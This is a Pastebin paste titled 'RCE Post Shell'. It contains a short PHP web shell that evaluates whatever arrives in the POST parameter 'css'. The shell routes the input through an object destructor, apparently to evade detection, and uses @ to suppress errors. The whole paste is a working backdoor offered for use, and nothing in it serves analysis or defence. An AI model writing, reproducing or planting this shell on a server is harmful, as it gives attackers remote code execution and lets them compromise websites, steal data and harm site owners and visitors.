Advertisement
willysec_id

RCE Post Shell

Jan 4th, 2024
969
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.18 KB | Cybersecurity | 0 0
  1. <?php
  2. class  Test{
  3.     public $name = '';
  4.     function __destruct(){
  5.         @eval("$this->name");
  6.     }
  7. }
  8. $test= new Test();
  9. $c = @$_POST['css'];
  10. $test->name = $c;
  11. ?>egm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement